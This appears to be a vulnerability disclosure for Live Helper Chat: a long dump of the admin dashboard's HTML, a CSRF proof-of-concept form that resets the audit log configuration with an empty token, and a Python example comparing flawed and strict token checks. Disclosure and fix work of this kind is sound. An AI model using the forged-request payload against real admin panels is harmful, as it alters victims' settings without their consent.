'expand_less' : 'expand_more'}}</a></div><div id="right-active-chats" ng-show="active_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.actived.length == 0 ? "All departments" : (lhc.actived.length == 1 && true ? lhc.activedNames.join(", ") : '['+lhc.actived.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('actived',true)" type="checkbox" ng-model="lhc.actived_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_products" checklist-change="lhc.productChanged('actived_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_dpgroups" checklist-change="lhc.productChanged('actived_dpgroups')" 
checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.actived_only_explicit_online == true && department.oexp == false) || (lhc.actived_hide_hidden == true && department.hidden == true) || (lhc.actived_hide_disabled == true && department.disabled == true) || (lhc.actived_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.actived" checklist-change="lhc.departmentChanged('actived')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.activeu" checklist-change="lhc.productChanged('activeu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_ugroups" checklist-change="lhc.productChanged('actived_ugroups')" checklist-value="userGroup.id"><i title="User group" class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div 
class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limita" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','loc_dsc','loc_asc',true)"><i title="Location" class="material-icons">&#xE0C8;</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'loc_dsc')}" title="Sort by location" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'loc_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' ? 'trending_up' : 'trending_down'}}</i></a>&nbsp;&nbsp;&nbsp;<a ng-click="lhc.toggleWidgetSort('active_chats_sort','u_dsc','u_asc',true)"><i title="Visitor" class="material-icons">face</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'u_dsc')}" title="Sort by visitor nick" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'u_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' ? 
'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','lmt_dsc','lmt_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'lmt_dsc')}" title="Sort by last message time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'lmt_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' ? 'trending_up' : 'trending_down'}}</i></a><a ng-click="lhc.toggleWidgetSort('active_chats_sort','id_dsc','id_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'id_dsc')}" title="Sort by chat start time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'id_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','op_dsc','op_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'op_dsc')}" title="Sort by operator" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'op_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','dep_dsc','dep_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'dep_dsc')}" title="Sort by department" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'dep_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' ? 
'trending_up' : 'trending_down'}}</i></a></th></tr></thead><tr ng-repeat="chat in active_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="Chat started at - {{chat.time_created_front}}"><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.last_msg_time_front ? chat.last_msg_time_front : '&#x2709;'}}</div></td><td><div class="abbr-list" title="{{chat.n_off_full}} | {{chat.plain_user_name}}">{{chat.n_office}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? 
' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="active_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header" ng-if="unread_chats.list.length > 0"><a class="title-card-header" href="/site_admin/chat/list/(hum)/1"><i class="material-icons chat-unread">chat</i>Unread messages ({{unread_chats.list.length}}{{unread_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('unread_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{unread_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="unread_chats_expanded == true" id="right-unread-chats"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="unread_chats.list.length > 0"><thead><tr><th width="50%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="30%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in unread_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event)" 
class="material-icons">info_outline</a> {{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.">{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table><div ng-if="unread_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div ng-if="bot_chats" class="" data-panel-id="bot_chats" ng-init="lhc.getToggleWidget('botc_widget_exp');lhc.getToggleWidgetSort('bot_chats_sort')"><div class="card-header"><i class="material-icons mr-0 action-image" onclick="return lhc.revealModal({'url':WWW_DIR_JAVASCRIPT +'genericbot/notifications'})">settings_applications</i><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/5"><i class="material-icons chat-active">android</i> Bot chats ({{bot_chats.list.length}}{{bot_chats.list.length == lhc.limitb ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleWidget('botc_widget_exp')" class="fs24 float-right material-icons exp-cntr">{{lhc.toggleWidgetData['botc_widget_exp'] == false ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="lhc.toggleWidgetData['botc_widget_exp'] !== true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.botd.length == 0 ? "All departments" : (lhc.botd.length == 1 && true ? 
lhc.botdNames.join(", ") : '['+lhc.botd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('botd',true)" type="checkbox" ng-model="lhc.botd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_products" checklist-change="lhc.productChanged('botd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_dpgroups" checklist-change="lhc.productChanged('botd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.botd_only_explicit_online == true && department.oexp == false) || (lhc.botd_hide_hidden == true && department.hidden == true) || (lhc.botd_hide_disabled == true && department.disabled == true) || (lhc.botd_only_online == true && 
department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.botd" checklist-change="lhc.departmentChanged('botd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitb" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="bot_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in bot_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><span title="Number of messages by 
user">[{{chat.msg_v || 0}}]</span>&nbsp;<i title="More than {{lhc.bot_st.msg_nm}} user messages" ng-show="chat.msg_v > lhc.bot_st.msg_nm" class="material-icons text-warning">whatshot</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.time_created_front}}">{{chat.time_created_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="bot_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Bot chats will appear here....</div></div></div></div></div></div></div></div><div class="p-1 border-top" translate="no"><p class="float-right small"><a target="_blank" rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat &copy; 2022</a></p>
<p class="small"><a rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat</a></p>
</div><script type="text/javascript" src="/design/defaulttheme/js/js_static/55ece73a8d637ed105f7df02bf7597c8.js?1641801573"></script></body></html>

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/audit/configuration" method="POST">
      <input type="hidden" name="csfr&#95;token" value="" />
      <input type="hidden" name="days&#95;log" value="90" />
      <input type="hidden" name="log&#95;js" value="on" />
      <input type="hidden" name="StoreOptions" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can be used to trick an admin into changing the audit log configuration.
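The behaviour reported above, where an empty csfr_token is still accepted, is what a check produces when it only compares tokens if one was submitted. The following is an added example, not Live Helper Chat's code: it contrasts an assumed flawed check of that kind with a fail-closed one, using the request body from this report as constructed input. All function names and the session dict are hypothetical.

```python
import hmac
import secrets
from urllib.parse import parse_qs

TOKEN_FIELD = "csfr_token"  # field name as it appears in the request on this page


def issue_token(session: dict) -> str:
    """Create a per-session token and keep a copy server-side."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def submitted_token(body: str) -> str:
    """Extract the token from a form-urlencoded body; blank values are kept."""
    values = parse_qs(body, keep_blank_values=True).get(TOKEN_FIELD, [])
    # A repeated field is ambiguous, so treat it like a missing one.
    return values[0] if len(values) == 1 else ""


def weak_check(session: dict, body: str) -> bool:
    """Flawed pattern (assumed, for illustration): compares only if a token was sent."""
    token = submitted_token(body)
    if token and token != session.get("csrf"):
        return False
    return True  # an empty or absent token falls through and is accepted


def strict_check(session: dict, body: str) -> bool:
    """Fail closed: both tokens must be non-empty and match in constant time."""
    expected = session.get("csrf") or ""
    token = submitted_token(body)
    if not expected or not token:
        return False
    return hmac.compare_digest(token.encode(), expected.encode())


def handle_post(session: dict, body: str, check) -> int:
    """Return the HTTP status a state-changing handler would send."""
    if not check(session, body):
        return 403
    # ... the settings would be stored here ...
    return 200


# Constructed sample input: the body from the request above, plus variants.
SESSION = {}
GOOD = issue_token(SESSION)
EMPTY_TOKEN_BODY = "csfr_token=&days_log=90&log_js=on&StoreOptions=Save"
NO_TOKEN_BODY = "days_log=90&log_js=on&StoreOptions=Save"
VALID_BODY = f"csfr_token={GOOD}&days_log=90&log_js=on&StoreOptions=Save"
WRONG_BODY = "csfr_token=not-the-token&days_log=90&log_js=on&StoreOptions=Save"

if __name__ == "__main__":
    for name, body in [("empty", EMPTY_TOKEN_BODY), ("missing", NO_TOKEN_BODY),
                       ("wrong", WRONG_BODY), ("valid", VALID_BODY)]:
        print(name, handle_post(SESSION, body, weak_check),
              handle_post(SESSION, body, strict_check))
```

A regression test for the fix should cover the empty-token and missing-token bodies explicitly, since a check that handles only a wrong token passes the usual test and still fails open.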
